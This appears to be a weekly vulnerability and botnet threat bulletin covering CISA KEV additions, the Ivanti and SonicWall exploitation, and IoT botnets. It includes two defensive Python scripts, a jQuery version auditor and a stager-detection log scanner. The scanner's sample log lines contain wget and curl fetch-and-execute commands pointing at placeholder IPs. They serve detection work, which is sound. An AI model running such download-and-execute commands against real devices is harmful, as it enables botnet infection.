Executive Summary
This week, CISA has added a five-year-old jQuery vulnerability to its KEV catalog, highlighting its continued risk to systems. Additionally, zero-day exploitation has been detected in SonicWall SMA1000 appliances, signaling active attacks targeting vulnerable systems. In a joint advisory, CISA and the FBI warned of an ongoing, sophisticated exploit chain targeting Ivanti Cloud Service Appliance, where multiple vulnerabilities are being leveraged by threat actors to orchestrate complex attacks.
The botnet ecosystem remains highly active, with botnets like EnemyBot and Sysrv-K exploiting vulnerabilities in the Spring Cloud Gateway. Meanwhile, the IoT Reaper botnet has been exploiting a 12-year-old Cisco router vulnerability, underscoring the risks posed by legacy systems. Long-standing threats, including Mirai and Tsunami, continue to target outdated infrastructure using a nine-year-old flaw in the Eir D1000 Modem.
The Murdoc Botnet, a variant of the Mirai campaign, exploited vulnerabilities in AVTECH Cameras and Huawei HG532 routers to compromise IoT devices. Similarly, the AIRASHI Botnet targeted weaknesses in AVTECH IP cameras, LILIN DVRs, and Shenzhen TVT products to launch large-scale DDoS attacks. Additionally, the "Mikro Typo" botnet leveraged a global network of compromised MikroTik routers to send malicious emails.
Trending / Critical Vulnerabilities
Current trending vulnerabilities offer insight into the latest emerging and widely discussed threats, helping defenders make informed decisions.
A Pre-authentication Remote Code Execution Vulnerability has been discovered in SonicWall SMA1000 Appliance Management Console (AMC) and Central Management Console (CMC) versions 12.4.3-02804 and prior. This zero-day vulnerability, discovered and reported by the Microsoft Threat Intelligence Center (MSTIC), allows attackers to execute arbitrary code on affected devices without any prior authentication. SonicWall's PSIRT has issued an urgent warning, as active exploitation of this flaw is likely underway.
An OS Command Injection Vulnerability in Ivanti Cloud Service Appliance enables a remote, authenticated attacker to execute arbitrary code. CISA and the FBI issued a joint advisory revealing that this vulnerability has been exploited as part of an attack chain together with CVE-2024-8963 and CVE-2024-9380. This chain enables threat actors to gain initial access, achieve remote code execution (RCE), steal credentials, and deploy web shells on compromised networks. This vulnerability was added to CISA's Known Exploited Vulnerabilities (KEV) Catalog in September 2024.
A Path Traversal Vulnerability in Ivanti Cloud Service Appliance enables attackers to bypass administrative authentication and execute arbitrary commands. In a joint advisory, CISA and the FBI disclosed that this vulnerability is being actively exploited in conjunction with CVE-2024-8190, CVE-2024-9379 and CVE-2024-9380 as part of an attack chain. This exploitation enables threat actors to gain initial access, perform remote code execution (RCE), harvest credentials, and deploy web shells on targeted networks. This vulnerability was added to CISA’s Known Exploited Vulnerabilities (KEV) Catalog in September 2024.
An SQL Injection Vulnerability in the Ivanti Cloud Service Appliance enables a remote, authenticated attacker with administrator privileges to execute arbitrary SQL commands. In a joint advisory, CISA and the FBI disclosed that this vulnerability is being actively exploited in conjunction with CVE-2024-8963 as part of an attack chain. This exploitation enables threat actors to gain initial access, perform remote code execution (RCE), harvest credentials, and deploy web shells on targeted networks. This vulnerability was added to CISA’s Known Exploited Vulnerabilities (KEV) Catalog in October 2024.
A Command Injection Vulnerability in the Ivanti Cloud Service Appliance enables a remote, authenticated attacker with administrator privileges to execute arbitrary commands on the system. In a joint advisory, CISA and the FBI disclosed that this vulnerability is being actively exploited in conjunction with CVE-2024-8190, CVE-2024-8963 and CVE-2024-9379 as part of an attack chain. This exploitation enables threat actors to gain initial access, perform remote code execution (RCE), harvest credentials, and deploy web shells on targeted networks. This vulnerability was added to CISA’s Known Exploited Vulnerabilities (KEV) Catalog in October 2024.
A Cross-Site Scripting Vulnerability in jQuery versions 1.0.3 through 3.4.1, triggered by appending HTML that contains option elements, has been identified as a critical security risk. Despite being a five-year-old vulnerability, it remains significant due to its association with malware families, including OceanSalt, Auriga, Bangat, BISCUIT, MAPIGET, TARSIP, SEASALT, KURTON, and HELAUTO. Although it was addressed in jQuery 3.5.0, the vulnerability was recently added to the CISA Known Exploited Vulnerabilities (KEV) Catalog, emphasizing its continued exploitation in cybersecurity incidents.
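Because the affected range is defined purely by version (1.0.3 through 3.4.1, fixed in 3.5.0), the practical defender task is inventory: find every jQuery copy a site loads and decide whether it falls in the range. The script below is an added example written for this bulletin, not code from jQuery, CISA or Loginsoft. It extracts jQuery script references from a constructed sample page, reads the version from the file name where one is present, and falls back to the library's own `/*! jQuery vX.Y.Z` header comment when the file name is unversioned (the sample HTML and all paths in it are made up).

```python
import re

# Affected range as stated in the bulletin: jQuery 1.0.3 through 3.4.1; fixed in 3.5.0.
VULN_MIN = (1, 0, 3)
FIXED_IN = (3, 5, 0)

# Constructed sample page (not from any real site) with three jQuery references.
SAMPLE_HTML = """
<html><head>
<script src="/static/js/jquery-1.12.4.min.js"></script>
<script src="https://code.jquery.com/jquery-3.5.1.slim.min.js?v=2"></script>
<script src="/vendor/jquery.min.js"></script>
<script src="/static/js/app.js"></script>
</head><body></body></html>
"""

SCRIPT_SRC = re.compile(r'<script[^>]*\ssrc=["\']([^"\']+)["\']', re.IGNORECASE)
# Version embedded in the file name, e.g. jquery-3.4.1.min.js or jquery-3.5.1.slim.min.js
FILENAME_VERSION = re.compile(
    r'^jquery[-.](\d+\.\d+(?:\.\d+)?)(?:\.slim)?(?:\.min)?\.js$', re.IGNORECASE
)
# Version in the library's own header comment, e.g. "/*! jQuery v3.4.1 | (c) ..."
BANNER_VERSION = re.compile(r'jQuery\s+v(\d+\.\d+(?:\.\d+)?)')


def parse_version(text):
    """'3.4' -> (3, 4, 0); pads to three components so tuples compare cleanly."""
    parts = [int(p) for p in text.split('.')]
    return tuple((parts + [0, 0, 0])[:3])


def is_vulnerable(version):
    """True when the version lies in [1.0.3, 3.5.0), the range the bulletin names."""
    return VULN_MIN <= parse_version(version) < FIXED_IN


def version_from_src(src):
    """Read the version from a script URL's file name; None if it carries none."""
    basename = src.split('?', 1)[0].rsplit('/', 1)[-1]
    m = FILENAME_VERSION.match(basename)
    return m.group(1) if m else None


def version_from_banner(js_source):
    """Read the version from the header comment of a fetched jQuery file."""
    m = BANNER_VERSION.search(js_source)
    return m.group(1) if m else None


def audit_html(html):
    """List every jQuery script tag with its version and vulnerability verdict.

    A None verdict means the file name carries no version: fetch that file and
    run version_from_banner on its contents to resolve it.
    """
    findings = []
    for src in SCRIPT_SRC.findall(html):
        if 'jquery' not in src.lower():
            continue
        version = version_from_src(src)
        findings.append({
            "src": src,
            "version": version,
            "vulnerable": is_vulnerable(version) if version else None,
        })
    return findings


if __name__ == "__main__":
    for finding in audit_html(SAMPLE_HTML):
        print(finding)
```

Unversioned file names are deliberately reported as unknown rather than assumed safe; a renamed `jquery.min.js` is exactly where an old 1.x copy tends to hide.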
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and actively being scanned. As the source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.
Vulnerabilities Abused by Botnets
Vulnerabilities identified as exploited by botnets, including recent CVEs logged in MISP. The top 5 CVEs are presented with payloads suggestive of botnet activity, such as wget invocations that fetch a payload from a raw IP address.
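The heuristic just described, a downloader such as wget or curl pointed at a raw IPv4 literal, is easy to turn into detection logic. The script below is an added example, not Loginsoft's sensor code, and runs over a handful of constructed access-log lines (all addresses are RFC 5737 documentation ranges, not real indicators). It URL-decodes each request up to three times, since stagers are frequently double-encoded, and only flags a line when an IP-literal URL follows the downloader keyword; the counter at the end lets an analyst pivot on the staging hosts seen across the sample.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample access-log lines standing in for sensor telemetry.
# Addresses are documentation ranges (RFC 5737); nothing here is a real IoC.
SAMPLE_LOGS = [
    '203.0.113.5 - - [20/Jan/2025:10:01:02 +0000] "GET /cgi-bin/luci?cmd=wget%20http%3A%2F%2F198.51.100.7%2Fbins%2Farm7%20-O%20%2Ftmp%2Fx HTTP/1.1" 404 0',
    '203.0.113.9 - - [20/Jan/2025:10:02:15 +0000] "GET /index.html HTTP/1.1" 200 512',
    '198.51.100.21 - - [20/Jan/2025:10:03:40 +0000] "POST /soap.cgi HTTP/1.1" 500 0 "cd /tmp; curl -O http://192.0.2.44/sh; sh sh"',
    '203.0.113.5 - - [20/Jan/2025:10:04:01 +0000] "GET /download?src=https://example.com/pkg.tgz HTTP/1.1" 200 0',
    '203.0.113.77 - - [20/Jan/2025:10:05:12 +0000] "GET /?x=wget%2520http%253A%252F%252F192.0.2.99%252Fmips HTTP/1.1" 400 0',
]

SRC_IP = re.compile(r'^(\d{1,3}(?:\.\d{1,3}){3})\s')
DOWNLOADER = re.compile(r'\b(wget|curl|tftp)\b', re.IGNORECASE)
# A URL whose host is a raw IPv4 literal, optionally with a port and a path.
IP_LITERAL_URL = re.compile(
    r'(?:https?|ftp|tftp)://(\d{1,3}(?:\.\d{1,3}){3})(?::\d{1,5})?(/[\w./-]*)?'
)


def decode_layers(text, max_rounds=3):
    """URL-decode repeatedly: botnet stagers are often double-encoded."""
    for _ in range(max_rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def valid_ipv4(addr):
    """Reject strings like 999.1.1.1 that merely look like an address."""
    return all(0 <= int(octet) <= 255 for octet in addr.split('.'))


def scan_line(line):
    """Return a finding dict when a line looks like a botnet stager, else None."""
    src = SRC_IP.match(line)
    decoded = decode_layers(line)
    tool = DOWNLOADER.search(decoded)
    if not tool:
        return None
    # Only look for the payload host after the downloader keyword, so a
    # legitimate request that merely contains an IP elsewhere is not flagged.
    url = IP_LITERAL_URL.search(decoded, tool.end())
    if not url or not valid_ipv4(url.group(1)):
        return None
    return {
        "src_ip": src.group(1) if src else None,
        "downloader": tool.group(1).lower(),
        "stage_host": url.group(1),
        "stage_path": url.group(2) or "/",
    }


def scan_logs(lines):
    """Apply scan_line to every line and keep only the hits."""
    return [f for f in (scan_line(line) for line in lines) if f]


def top_stage_hosts(findings):
    """Count distinct payload hosts so analysts can pivot on infrastructure."""
    return Counter(f["stage_host"] for f in findings).most_common()


if __name__ == "__main__":
    hits = scan_logs(SAMPLE_LOGS)
    for hit in hits:
        print(hit)
    print(top_stage_hosts(hits))
```

The fourth sample line, a legitimate download parameter with a hostname URL, is left alone: the signal is the combination of a shell downloader and an IP-literal host, not either one on its own.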
Vulnerabilities Abused by Malware
We proactively monitor the vulnerabilities targeted by adversaries. Each vulnerability is manually analyzed and mapped to MITRE ATT&CK tactics and techniques. The information is derived from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites, and more.
CVE-2024-7029 and CVE-2017-17215
The Qualys Threat Research Unit has uncovered a significant, ongoing operation within the Mirai campaign, known as the Murdoc Botnet. This variant targets vulnerabilities in AVTECH Cameras and Huawei HG532 routers, exploiting them to gain initial access to Internet of Things (IoT) devices. Active since at least July 2024, the campaign has infected over 1,370 systems, with most victims located in Malaysia, Mexico, Thailand, Indonesia, and Vietnam. The botnet uses known security flaws to compromise devices and deploy its next-stage payload through a shell script.
A Privilege Escalation Vulnerability in MikroTik RouterOS has been exploited to create a global botnet of approximately 13,000 compromised MikroTik routers. Codenamed "Mikro Typo," the campaign leverages misconfigured DNS records to bypass email protection measures, enabling malicious emails to appear as though they originate from legitimate domains. According to Infoblox researcher David Brunsdon, the botnet has been used in spam campaigns, with a notable instance in late November 2024 involving freight invoice-themed lures to deliver malicious ZIP archive payloads. While the initial access vector remains unclear, the operation affects multiple firmware versions of MikroTik routers, highlighting the risks of unpatched vulnerabilities and misconfigured devices.
AIRASHI Botnet powers large-scale DDoS attacks
Threat actors are actively exploiting an undisclosed zero-day vulnerability in Cambium Networks cnPilot routers to deploy a variant of the AISURU botnet, known as AIRASHI, to carry out distributed denial-of-service (DDoS) attacks. These attacks, active since June 2024 according to QiAnXin XLab, rely on an unpatched security flaw, with details intentionally withheld to prevent further abuse. The AIRASHI Botnet also exploits multiple known vulnerabilities in devices such as AVTECH IP cameras, LILIN DVRs, and Shenzhen TVT products to enhance its impact. Most of the compromised devices are in Brazil, Russia, Vietnam, and Indonesia, while the botnet’s DDoS campaigns primarily target China, the United States, Poland, and Russia.
PRE-NVD observed for this week
PRE-NVD refers to vulnerabilities discovered, and potentially exploited, before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts with plans to expand.
External References
- https://www.cisa.gov/news-events/alerts/2025/01/23/cisa-adds-one-known-exploited-vulnerability-catalog
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-022a
- https://www.cisa.gov/news-events/alerts/2025/01/22/cisa-and-fbi-release-advisory-how-threat-actors-chained-vulnerabilities-ivanti-cloud-service
- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0002
- https://blog.qualys.com/vulnerabilities-threat-research/2025/01/21/mass-campaign-of-murdoc-botnet-mirai-a-new-variant-of-corona-mirai
- https://blogs.infoblox.com/threat-intelligence/one-mikro-typo-how-a-simple-dns-misconfiguration-enables-malware-delivery-by-a-russian-botnet/
- https://blog.xlab.qianxin.com/large-scale-botnet-airashi-en/